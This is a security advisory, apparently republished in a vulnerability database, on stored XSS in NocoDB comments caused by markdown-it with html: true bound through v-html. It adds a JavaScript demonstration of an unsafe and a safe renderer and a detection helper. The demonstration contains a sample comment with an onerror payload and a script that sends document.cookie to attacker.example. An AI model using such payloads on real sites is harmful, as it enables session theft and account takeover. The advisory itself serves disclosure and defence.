Server side cross-site scripting in NocoDB

Description

NocoDB Vulnerable to Stored Cross-site Scripting via Comments

Summary

Comments rendered via v-html without sanitization, enabling stored XSS.

Details

Comments in Comments.vue were parsed by markdown-it configured with html: true, and the resulting HTML was bound with v-html without first being sanitized by DOMPurify. With html: true, raw HTML inside the markdown is copied into the output unchanged, so a user holding only the Commenter role can embed arbitrary markup (for example an element with an inline event handler, or a script tag) in a comment; the markup is stored with the comment and executes in the browser of every user who views it.
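The pattern described above, as an added illustration that is not NocoDB's code: a deliberately tiny markdown renderer stands in for markdown-it so the example runs offline with no dependencies. renderCommentUnsafe models markdown-it with html: true (raw HTML passes straight through to what would be bound with v-html), renderCommentSafe models html: false (HTML-significant characters are escaped before any markup is generated), and findActiveContent is a small audit over the rendered string. The comment text and the attacker.example host are constructed for the example. In the real component the fix implied by the advisory is to run the markdown-it output through DOMPurify.sanitize() before v-html, or to render with html: false; the escaping in this toy exists only to make the difference observable and is not a substitute for DOMPurify.

```javascript
// Added illustration of the bug class in the advisory above; this is not NocoDB
// code. A deliberately tiny markdown renderer stands in for markdown-it so the
// example runs offline: it supports **bold**, *italic*, [text](url) and paragraphs.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape every HTML-significant character in untrusted text.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Link targets are restricted to a scheme allow-list, as markdown-it's default
// link validator does, so [x](javascript:...) degrades to plain text.
const SAFE_HREF = /^(?:https?:\/\/|mailto:|\/|#)/i;

function renderInline(text) {
  return text
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/\*(.+?)\*/g, '<em>$1</em>')
    .replace(/\[([^\]]+)\]\(([^)\s]+)\)/g, (match, label, href) =>
      SAFE_HREF.test(href) ? `<a href="${href}">${label}</a>` : label);
}

function renderParagraphs(markdown, prepare) {
  return markdown
    .split(/\n{2,}/)
    .map((para) => `<p>${renderInline(prepare(para))}</p>`)
    .join('\n');
}

// Models markdown-it with `html: true`: raw HTML inside the comment is copied
// into the output untouched, so <img onerror=...> and <script> survive and run
// once the string is bound with v-html.
function renderCommentUnsafe(markdown) {
  return renderParagraphs(markdown, (para) => para);
}

// Models markdown-it with `html: false`: HTML-significant characters are escaped
// before any markup is generated, so attacker HTML is shown as literal text.
function renderCommentSafe(markdown) {
  return renderParagraphs(markdown, escapeHtml);
}

// Audit helper for a reviewer or a test: list the active-content constructs that
// make a rendered fragment unsafe to bind with v-html. An empty result means none
// of these patterns matched; this is a smoke test, not a sanitizer.
function findActiveContent(html) {
  const findings = [];
  if (/<script\b/i.test(html)) findings.push('script tag');
  if (/<[^>]*\son[a-z]+\s*=/i.test(html)) findings.push('inline event handler');
  if (/\b(?:href|src)\s*=\s*["']?\s*javascript:/i.test(html)) findings.push('javascript: URL');
  if (/<(?:iframe|object|embed|svg|math)\b/i.test(html)) findings.push('embedded content tag');
  return findings;
}

// Constructed sample: a comment posted by a user holding only the Commenter role.
const MALICIOUS_COMMENT =
  'Looks **good** to me <img src=x onerror="alert(document.cookie)">\n\n' +
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

if (typeof require !== 'undefined' && require.main === module) {
  const unsafe = renderCommentUnsafe(MALICIOUS_COMMENT);
  const safe = renderCommentSafe(MALICIOUS_COMMENT);
  console.log('html: true  ->', findActiveContent(unsafe)); // ['script tag', 'inline event handler']
  console.log('html: false ->', findActiveContent(safe));   // []
}
```

Run it with node to print the audit result for both renderers. The same findActiveContent check, pointed at the string a component is about to hand to v-html, is a cheap regression test to keep around after a fix like this one; it catches the obvious constructs but, unlike DOMPurify, it does not understand HTML parsing and should not be relied on as the sanitizer itself.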

Impact

Stored XSS: the injected script is persisted with the comment and runs, with the viewer's session and privileges, in the browser of any user who views it, including users whose role is more privileged than the Commenter who posted it.

Credit

This issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members @p- (Peter Stockli) and @m-y-mo (Man Yue Mo).

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

FLAT-4PNF0 – Vulnerability | Fluid Attacks Database